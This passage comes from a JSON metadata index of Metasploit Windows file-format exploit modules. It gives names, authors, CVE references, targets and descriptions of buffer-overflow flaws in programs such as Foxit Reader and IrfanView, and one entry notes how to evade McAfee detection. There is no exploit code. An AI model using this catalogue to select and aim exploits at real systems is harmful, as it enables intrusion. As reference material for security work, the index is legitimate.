"windows/fileformat/foxit_reader_uaf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/foxit_title_bof": { - "name": "Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow", - "fullname": 
"exploit/windows/fileformat/foxit_title_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-11-13", - "type": "exploit", - "author": [ - "dookie", - "Sud0", - "corelanc0d3r ", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Foxit PDF Reader prior to version\n 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that\n contains an overly long string in the Title field. This results in overwriting a\n structured exception handler record.\n\n NOTE: This exploit does not use javascript.", - "references": [ - "OSVDB-68648", - "EDB-15532", - "URL-http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Foxit Reader v4.1.1 XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/foxit_title_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/foxit_title_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/free_mp3_ripper_wav": { - "name": "Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/free_mp3_ripper_wav", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-08-27", - "type": "exploit", - "author": [ - "Richard Leahy", - "X-h4ck", - "Tiago Henriques", - "James Fitts " - ], - "description": "This module exploits a stack based buffer overflow found in Free MP3 CD\n Ripper 1.1. 
The overflow is triggered when an unsuspecting user opens a malicious\n WAV file.", - "references": [ - "CVE-2011-5165", - "OSVDB-63349", - "EDB-11975", - "EDB-17727" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 EN" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/free_mp3_ripper_wav", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/galan_fileformat_bof": { - "name": "gAlan 0.2.1 Buffer Overflow", - "fullname": "exploit/windows/fileformat/galan_fileformat_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-12-07", - "type": "exploit", - "author": [ - "Jeremy Brown <0xjbrown41@gmail.com>", - "loneferret" - ], - "description": "This module exploits a stack buffer overflow in gAlan 0.2.1\n by creating a specially crafted galan file.", - "references": [ - "OSVDB-60897", - "EDB-10339" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/galan_fileformat_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/galan_fileformat_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/greenshot_deserialize_cve_2023_34634": { - "name": "Greenshot .NET Deserialization Fileformat Exploit", - "fullname": "exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-07-26", - "type": "exploit", - "author": [ - "p4r4bellum", 
- "bwatters-r7" - ], - "description": "There exists a .NET deserialization vulnerability in Greenshot version 1.3.274\n and below. The deserialization allows the execution of commands when a user opens\n a Greenshot file. The commands execute under the same permissions as the Greenshot\n service. Typically, is the logged in user.", - "references": [ - "CVE-2023-34634", - "EDB-51633" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2023-08-17 08:48:42 +0000", - "path": "/modules/exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/greenshot_deserialize_cve_2023_34634", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/gsm_sim": { - "name": "GSM SIM Editor 5.15 Buffer Overflow", - "fullname": "exploit/windows/fileformat/gsm_sim", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-07-07", - "type": "exploit", - "author": [ - "Ruben Alejandro", - "chap0 ", - "Lincoln " - ], - "description": "This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.\n When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer\n overflow occurs which allows an attacker to execute arbitrary code.", - "references": [ - "CVE-2015-1171", - "OSVDB-81161", - "EDB-14258" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/gsm_sim.rb", - "is_install_path": true, - "ref_name": 
"windows/fileformat/gsm_sim", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/gta_samp": { - "name": "GTA SA-MP server.cfg Buffer Overflow", - "fullname": "exploit/windows/fileformat/gta_samp", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-09-18", - "type": "exploit", - "author": [ - "Silent_Dream" - ], - "description": "This module exploits a stack-based buffer overflow in GTA SA-MP Server.\n This buffer overflow occurs when the application attempts to open a malformed\n server.cfg file. To exploit this vulnerability, an attacker must send the\n victim a server.cfg file and have them run samp-server.exe.", - "references": [ - "OSVDB-83433", - "EDB-17893" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "GTA SA-MP (samp-server) v0.3.1.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/gta_samp.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/gta_samp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/hhw_hhp_compiledfile_bof": { - "name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", - "fullname": "exploit/windows/fileformat/hhw_hhp_compiledfile_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-02-06", - "type": "exploit", - "author": [ - "bratax", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n By creating a specially crafted hhp file, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2006-0564", - "OSVDB-22941", - "EDB-1488", - "EDB-1490" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - 
"autofilter_services": [], - "targets": [ - "Windows XP English SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/hhw_hhp_compiledfile_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/hhw_hhp_contentfile_bof": { - "name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", - "fullname": "exploit/windows/fileformat/hhw_hhp_contentfile_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-02-06", - "type": "exploit", - "author": [ - "bratax", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.", - "references": [ - "CVE-2006-0564", - "OSVDB-22941", - "EDB-1470", - "EDB-1495" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP English SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/hhw_hhp_contentfile_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/hhw_hhp_indexfile_bof": { - "name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", - "fullname": "exploit/windows/fileformat/hhw_hhp_indexfile_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-01-17", - "type": "exploit", - "author": [ - "Encrypt3d.M!nd", - "loneferret", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.", - "references": [ - 
"CVE-2009-0133", - "BID-33189", - "OSVDB-22941", - "EDB-10323", - "EDB-10335" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP English SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/hhw_hhp_indexfile_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/homm3_h3m": { - "name": "Heroes of Might and Magic III .h3m Map file Buffer Overflow", - "fullname": "exploit/windows/fileformat/homm3_h3m", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-07-29", - "type": "exploit", - "author": [ - "Pierre Lindblad", - "John AAkerblom" - ], - "description": "This module embeds an exploit into an uncompressed map file (.h3m) for\n Heroes of Might and Magic III. 
Once the map is started in-game, a\n buffer overflow occurring when loading object sprite names leads to\n shellcode execution.", - "references": [ - "EDB-37716" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]", - "HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]", - "Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]" - ], - "mod_time": "2023-07-14 12:46:26 +0000", - "path": "/modules/exploits/windows/fileformat/homm3_h3m.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/homm3_h3m", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ht_mp3player_ht3_bof": { - "name": "HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow", - "fullname": "exploit/windows/fileformat/ht_mp3player_ht3_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-06-29", - "type": "exploit", - "author": [ - "hack4love ", - "His0k4", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HT-MP3Player 1.0.\n Arbitrary code execution could occur when parsing a specially crafted\n .HT3 file.\n\n NOTE: The player installation does not register the file type to be\n handled. 
Therefore, a user must take extra steps to load this file.", - "references": [ - "CVE-2009-2485", - "OSVDB-55449", - "EDB-9034", - "EDB-9038" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HT-MP3Player 1.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ht_mp3player_ht3_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ibm_forms_viewer_fontname": { - "name": "IBM Forms Viewer Unicode Buffer Overflow", - "fullname": "exploit/windows/fileformat/ibm_forms_viewer_fontname", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-12-05", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability\n is due to a dangerous usage of a strcpy-like function, and occurs while parsing malformed\n XFDL files containing a long fontname value. 
This module has been tested successfully on IBM\n Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2013-5447", - "OSVDB-100732", - "ZDI-13-274", - "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21657500" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ibm_forms_viewer_fontname", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ibm_pcm_ws": { - "name": "IBM Personal Communications iSeries Access WorkStation 5.9 Profile", - "fullname": "exploit/windows/fileformat/ibm_pcm_ws", - "aliases": [], - "rank": 500, - "disclosure_date": "2012-02-28", - "type": "exploit", - "author": [ - "TecR0c " - ], - "description": "The IBM Personal Communications I-Series application WorkStation is susceptible to a\n stack-based buffer overflow vulnerability within file parsing in which data copied to a\n location in memory exceeds the size of the reserved destination area. The buffer is located\n on the runtime program stack.\n\n When the WorkStation file is opened it will reach the code path at 0x67575180 located in\n pcspref.dll which conducts string manipulation and validation on the data supplied in the\n WorkStation file. The application will first check if 'Profile' header exists and appends\n a dot with the next parameter within the file. 
It will then measure the character length\n of the header by calling strcspn with a dot as its null-terminated character.\n\n It will then write the header into memory and ensure the header ends with a NUL character.\n The parameter character array is passed to the strcpy() function. The application has\n declared a 52-element character array for the destination for strcpy function. The\n function does not perform bounds checking therefore, data can be written paste the end of\n the buffer variable resulting in corruption of adjacent variables including other local\n variables, program state information and function arguments. You will notice that the\n saved RETURN address at offset 0x6c is overwritten by the data written past the buffer.\n\n To ensure we can perform arbitrary code execution we must we provide a valid pointer at\n 0x74 which is used as an argument for the called function at 0x675751ED as an id file\n extension parameter. Once the caller regains control we will reach our RETURN. 
The Ret\n instruction will be used to pop the overwritten saved return address which was corrupted.\n\n This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform.\n\n Versions tested:\n IBM System i Access for Windows V6R1M0 version 06.01.0001.0000a\n Which bundles pcsws.exe version 5090.27271.709\n\n Tested on:\n Microsoft Windows XP [Version 5.1.2600]\n Microsoft Windows Vista [Version 6.0.6002]\n Microsoft Windows 7 [Version 6.1.7600]", - "references": [ - "CVE-2012-0201", - "OSVDB-79657", - "URL-https://www-304.ibm.com/support/docview.wss?uid=swg21586166" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IBM WorkStation 5.9 (Windows XP SP3)", - "IBM WorkStation 5.9 (Windows 7, Windows Vista)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ibm_pcm_ws.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ibm_pcm_ws", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/icofx_bof": { - "name": "IcoFX Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/icofx_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-12-10", - "type": "exploit", - "author": [ - "Marcos Accossatto", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in version 2.1\n of IcoFX. 
The vulnerability exists while parsing .ICO files, where a specially\n crafted ICONDIR header providing an arbitrary long number of images in the file\n can be used to trigger the overflow when reading the ICONDIRENTRY structures.", - "references": [ - "CVE-2013-4988", - "OSVDB-100826", - "BID-64221", - "EDB-30208", - "URL-http://www.coresecurity.com/advisories/icofx-buffer-overflow-vulnerability" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IcoFX 2.5 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/icofx_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/icofx_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ideal_migration_ipj": { - "name": "PointDev IDEAL Migration Buffer Overflow", - "fullname": "exploit/windows/fileformat/ideal_migration_ipj", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-05", - "type": "exploit", - "author": [ - "Dr_IDE", - "dookie", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in versions v9.7\n through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of\n IDEAL Migration. 
All versions are suspected to be vulnerable.\n By creating a specially crafted ipj file, an attacker may be able\n to execute arbitrary code.\n\n NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH", - "references": [ - "CVE-2009-4265", - "OSVDB-60681", - "EDB-10319", - "EDB-12403", - "EDB-12404", - "EDB-12540" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IDEAL Migration <= 4.5.1 on Windows XP", - "IDEAL Administration <= 10.5 on Windows XP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ideal_migration_ipj.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ideal_migration_ipj", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/iftp_schedule_bof": { - "name": "i-FTP Schedule Buffer Overflow", - "fullname": "exploit/windows/fileformat/iftp_schedule_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-11-06", - "type": "exploit", - "author": [ - "metacom", - "Gabor Seljan" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n i-Ftp v2.20, caused by a long time value set for scheduled download.\n\n By persuading the victim to place a specially-crafted Schedule.xml file\n in the i-FTP folder, a remote attacker could execute arbitrary code on\n the system or cause the application to crash. 
This module has been\n tested successfully on Windows XP SP3.", - "references": [ - "EDB-35177", - "OSVDB-114279" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/iftp_schedule_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/iftp_schedule_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/irfanview_jpeg2000_bof": { - "name": "Irfanview JPEG2000 jp2 Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/irfanview_jpeg2000_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-16", - "type": "exploit", - "author": [ - "Parvez Anwar ", - "mr_me ", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has\n been tested on a specific version of irfanview (v4.3.2), although other\n versions may work also. The vulnerability is triggered via parsing an\n invalid qcd chunk structure and specifying a malformed qcd size and\n data.\n\n Payload delivery and vulnerability trigger can be executed in multiple\n ways. The user can double click the file, use the file dialog, open via\n the icon and drag/drop the file into Irfanview's window. 
An egg hunter\n is used for stability.", - "references": [ - "CVE-2012-0897", - "OSVDB-78333", - "BID-51426", - "URL-http://www.greyhathacker.net/?p=525" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Irfanview 4.32 / Plugins 4.32 / Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/irfanview_jpeg2000_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ispvm_xcf_ispxcf": { - "name": "Lattice Semiconductor ispVM System XCF File Handling Overflow", - "fullname": "exploit/windows/fileformat/ispvm_xcf_ispxcf", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-16", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in ispVM System 18.0.2. Due to the way\n ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially\n crafted file, when a long value is supplied for the version attribute of the ispXCF\n tag. 
It results in arbitrary code execution under the context of the user.", - "references": [ - "OSVDB-82000", - "BID-53562", - "URL-http://web.archive.org/web/20121014002756/http://secunia.com/advisories/48740/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ispvm_xcf_ispxcf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/kingview_kingmess_kvl": { - "name": "KingView Log File Parsing Buffer Overflow", - "fullname": "exploit/windows/fileformat/kingview_kingmess_kvl", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-11-20", - "type": "exploit", - "author": [ - "Lucas Apa", - "Carlos Mario Penagos Hollman", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in KingView <= 6.55. It exists in\n the KingMess.exe application when handling log files, due to the insecure usage of\n sprintf. This module uses a malformed .kvl file which must be opened by the victim\n via the KingMess.exe application, through the 'Browse Log Files' option. 
The module\n has been tested successfully on KingView 6.52 and KingView 6.53 Free Trial over\n Windows XP SP3.", - "references": [ - "CVE-2012-4711", - "OSVDB-89690", - "BID-57909", - "URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-043-02.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "KingView 6.52 English / KingView 6.53 Free Trial / Kingmess.exe 65.20.2003.10300 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/kingview_kingmess_kvl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/lattice_pac_bof": { - "name": "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow", - "fullname": "exploit/windows/fileformat/lattice_pac_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-16", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer\n 6.21. 
As a .pac file, when supplying a long string of data to the 'value' field\n under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption\n on the stack, which results in arbitrary code execution under the context of the\n user.", - "references": [ - "CVE-2012-2915", - "OSVDB-82001", - "EDB-19006", - "BID-53566", - "URL-http://web.archive.org/web/20120523175252/http://secunia.com:80/advisories/48741" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "PAC-Designer 6.21 on Windows XP SP3" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/lattice_pac_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/lattice_pac_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/lotusnotes_lzh": { - "name": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)", - "fullname": "exploit/windows/fileformat/lotusnotes_lzh", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-05-24", - "type": "exploit", - "author": [ - "binaryhouse.net", - "alino <26alino@gmail.com>" - ], - "description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. 
This vulnerability was\n discovered binaryhouse.net", - "references": [ - "CVE-2011-1213", - "OSVDB-72706", - "BID-48018", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904", - "URL-http://www.ibm.com/support/docview.wss?uid=swg21500034" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal", - "Lotus Notes 8.5.2 FP2 / Windows Universal / DEP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/lotusnotes_lzh.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/lotusnotes_lzh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/magix_musikmaker_16_mmm": { - "name": "Magix Musik Maker 16 .mmm Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/magix_musikmaker_16_mmm", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-26", - "type": "exploit", - "author": [ - "acidgen", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in Magix Musik Maker 16.\n When opening a specially crafted arrangement file (.mmm) in the application, an\n unsafe strcpy() will allow you to overwrite a SEH handler. This exploit\n bypasses DEP & ASLR, and works on XP, Vista & Windows 7. 
Egghunter is used, and\n might require up to several seconds to receive a shell.", - "references": [ - "OSVDB-72063", - "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-002" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal DEP & ASLR Bypass" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/magix_musikmaker_16_mmm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mcafee_hercules_deletesnapshot": { - "name": "McAfee Remediation Client ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/fileformat/mcafee_hercules_deletesnapshot", - "aliases": [], - "rank": 100, - "disclosure_date": "2008-08-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. 
When\n sending an overly long string to the DeleteSnapshot() method\n of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.\n This control is not marked safe for scripting, so choose your attack vector accordingly.", - "references": [ - "OSVDB-94540", - "EDB-16639" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mcafee_hercules_deletesnapshot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mcafee_showreport_exec": { - "name": "McAfee SaaS MyCioScan ShowReport Remote Command Execution", - "fullname": "exploit/windows/fileformat/mcafee_showreport_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-12", - "type": "exploit", - "author": [ - "rgod", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in McAfee Security-as-a-Service.\n The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails\n to check the FileName argument, and passes it on to a ShellExecuteW() function,\n therefore allows any malicious attacker to execute any process that's on the\n local system. 
However, if the victim machine is connected to a remote share\n (or something similar), then it's also possible to execute arbitrary code.\n Please note that a custom template is required for the payload, because the\n default Metasploit template is detectable by McAfee -- any Windows binary, such\n as calc.exe or notepad.exe, should bypass McAfee fine.", - "references": [ - "OSVDB-78310", - "BID-51397", - "ZDI-12-012" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Internet Explorer" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mcafee_showreport_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mediacoder_m3u": { - "name": "MediaCoder .M3U Buffer Overflow", - "fullname": "exploit/windows/fileformat/mediacoder_m3u", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-24", - "type": "exploit", - "author": [ - "metacom", - "modpr0be ", - "otoy " - ], - "description": "This module exploits a buffer overflow in MediaCoder 0.8.22. The vulnerability\n occurs when adding an .m3u, allowing arbitrary code execution under the context\n of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder\n runs with DEP. 
